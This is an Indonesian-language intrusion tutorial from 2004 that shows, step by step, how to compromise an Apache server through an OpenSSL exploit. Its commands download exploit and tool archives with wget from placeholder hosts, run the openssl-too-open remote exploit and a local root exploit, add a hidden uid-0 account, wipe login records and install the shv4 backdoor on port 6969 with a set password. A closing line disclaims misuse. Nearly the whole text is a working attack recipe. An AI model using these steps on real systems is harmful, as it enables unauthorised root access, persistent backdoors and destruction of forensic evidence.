|
[025].
ROOTING APACHE LEWAT OPENSSL
------------------------------------------------------
Author : VR-X69
Contact : sectors.vze.com
CopyLEFT (c) 2004
www.spyrozone.tk All Rights Reserved
� 04/12/2004 18:03:20 WIB
------------------------------------------------------
1. Download
Apache Chunked Scanner
2. Download putty.exe
3. Scanning for IP range menggunakan Apache Chunked Scanner
4. Dapet target buka putty
5. login ke shell account lewat ssh <--- untuk user windows harus punya
shell account di suatu server yang pakai linux langsung aja ke langkah
6 dan ngga perlu putty
6. Download openSSL source code ke shell account kita dengan perintah 'wget
www.tempat-download.com/openssl-too-open.tar.gz'
7. ekstrak file dengan perintah 'tar -zxvf openssl-too-open.tar.gz'
8. masuk ke direktorinya dengan mengetikan 'cd openssl-too-open'
9. ketik 'make' lalu ketik 'chmod +x openssl'
10. ketik './openssl-too-open' akan terlihat jenis2 server yang bisa di
rooting
11. target Scanning dari Apache Chunked Scanner anggap saja
IP : 203.10.10.10
Apache : Apache 1.3.23
OS Linux : RedHat 7.3
12. Maka ketikan './openssl-too-open -a 0x0b -v 203.10.10.10'
13. Mulai local xploit ketik 'mkdir /var/tmp' lalu masuk ke dir ketik 'cd
/var/tmp'
14. Ketik 'wget www.tempat-download.com/local.tar.gz'
15. Ketik 'tar xzf local.tar.gz'
16. Ketik 'cd local'
17. Ketik './lconfex -p' akan diinformasikan shellcode, padstring, dan
magic-number
18. Buat direktori 'segfault.eng' dengan file 'segfault.eng' lalu
command touch dan kemudian commad './lconfex -s (shellcode) -m (padstring)
-r (magic-number)
untuk perintahnya
'mkdir segfault.eng ;
touch segfault.eng/segfault.eng'
'./lconfex -s (shellcode) -m (pandstring) -r (magic-number)'
untuk perintah diatas masalah shellcode, padstring, magic-number kamu pasti tau
setelah perintah 17 dijalankan
19. Ketik 'id' klo muncul ---> root uid=0(root) gid=48(apache)
groups=48(apache),89(sympa) <--- anda adalah root
Tahap adduser, pembersihan log, backdoor
1. ketik '/usr/sbin/useradd vr -u 0 -o -g root -s /bin/bash -d /dev/.vr passwd
-d vr <--- add user root nama vr
/usr/sbin/useradd vr <--- menambahkan login user nama vr
root <--- akses root
/bin/bash -d /dev/.vr <--- create dir vr
passwd -d vr <--- password vr
* catatan : login, direktori dan password harus sama
2. Buka new session pakek putty dan mulai login ke target
3. Ketik 'lastlog | grep vr'
4. Download tools untuk menghapus jejak kita ketik 'wget www.tempat-download.com/remove.c'
5. compile file tersebut ketik 'gcc -o r remove.c DGENERIC'
6. hapus log user vr ketik './remove vr'
7. Install backdoor ketik 'wget www.alamat-download.com/backdoor.tar.gz'
8. ketik 'tar xzf backdoor.tar.gz'
9. Ketik 'cd shv4'
10. Ketik './setup n3rd 6969' ---> n3rd = password login backdoor 6969 = port
backdoor
11. menghapus semua kemungkinan mengarah ke kita ; user dan direktori yang kita
buat ketik '/usr/sbin/userdel -r vr'
12. BERES... silahkan login ke shell dengan port 6969 dengan password n3rd pada
target :p
jangan diacak2 ya targetnya karena semua ini untuk pengetahuan segala bentuk
penyalahgunaan bukan tanggung jawab saya
VR-X69 (NERD)
/* ------------------------------|EOF|------------------------------ */
|